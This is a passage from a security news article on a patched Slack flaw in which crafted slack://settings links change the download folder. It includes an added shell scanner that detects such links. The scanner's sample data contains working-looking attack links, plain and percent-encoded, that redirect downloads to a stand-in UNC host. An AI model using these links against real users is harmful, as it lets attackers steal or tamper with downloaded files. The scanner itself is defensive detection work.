In this case, the attacker has to trick the victim into clicking a specially crafted link posted in a feed the channel pulls in. The download location can be changed even though the attacker has no access to the victim’s Slack workspace.

“Let’s consider an example with, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked.” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to.”
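Because the RSS route lets the link arrive from outside the workspace, a defender wants to spot it in whatever passes through: channel exports, the text of feeds a channel subscribes to, or a proxy log. The scanner below is an added example, not code from the article or from Tenable. It flags slack://settings links both in plain form and in the percent-encoded form they take when wrapped in a redirect URL, and rates a link that points PrefSSBFileDownloadPath at a UNC path highest, since that is the variant that lands downloads on a host the attacker controls. The sample lines, the host 203.0.113.7 and the URLs are constructed.

```shell
#!/bin/sh
# Added example (not from the article or from Tenable): scan text lines for
# the slack://settings links described above. Plain and percent-encoded forms
# are both flagged; a PrefSSBFileDownloadPath change to a UNC path ("\\host\share",
# or "%5C%5Chost%5Cshare" when encoded) is rated highest. All sample data is constructed.
#   usage: sh slack_link_scan.sh < export.txt    (no input runs the sample)

# Constructed input: two harmless lines, one raw slack:// link, one wrapped in a redirect
SAMPLE_LINES=$(cat <<'EOF'
Reminder: standup moved to 10:30, agenda in the usual doc
Updated deck: https://files.example.com/q2-deck.pptx
Check this out: slack://settings/?update={'PrefSSBFileDownloadPath':'\\203.0.113.7\share'}
From the blog feed: https://blog.example.org/go?to=slack%3A%2F%2Fsettings%2F%3Fupdate%3D%7B%27PrefSSBFileDownloadPath%27%3A%27%5C%5C203.0.113.7%5Cshare%27%7D
EOF
)

# has PATTERN: succeed if the line in $line matches the extended regex, case-insensitively
has() {
    printf '%s\n' "$line" | grep -qiE "$1"
}

# classify: print a verdict for the line in $line, or nothing for a clean line
classify() {
    if has 'slack://settings/\?update='; then
        form=plain
    elif has 'slack%3A%2F%2Fsettings%2F%3Fupdate%3D'; then
        form=percent-encoded
    else
        return 0
    fi
    if has 'PrefSSBFileDownloadPath'; then
        # two leading backslashes, raw or encoded, mean a UNC path: downloads leave the machine
        if has '\\\\|%5C%5C'; then
            echo "DOWNLOAD_PATH_TO_UNC ($form)"
        else
            echo "DOWNLOAD_PATH_CHANGE ($form)"
        fi
    else
        echo "SETTINGS_LINK ($form)"
    fi
}

# scan: read lines on stdin, print "<line no><TAB><verdict><TAB><line>" for each hit
scan() {
    n=0
    while IFS= read -r line; do
        n=$((n + 1))
        verdict=$(classify)
        [ -n "$verdict" ] && printf '%s\t%s\t%s\n' "$n" "$verdict" "$line"
    done
    return 0
}

# Stand-alone run: scan the sample, or `scan < export.txt` for real input
printf '%s\n' "$SAMPLE_LINES" | scan
```

A hit is worth acting on even after the fix shipped in 3.4.0: the link tells you who tried, and any user still on 3.3.7 or older who clicked it needs their download path checked and the files they opened from it treated as untrusted.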

The flaw was classified as “medium severity” because it requires user interaction. Slack awarded the researcher $500 under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)

The post A flaw in Slack could allow hackers to steal, manipulate downloaded files appeared first on Security Affairs.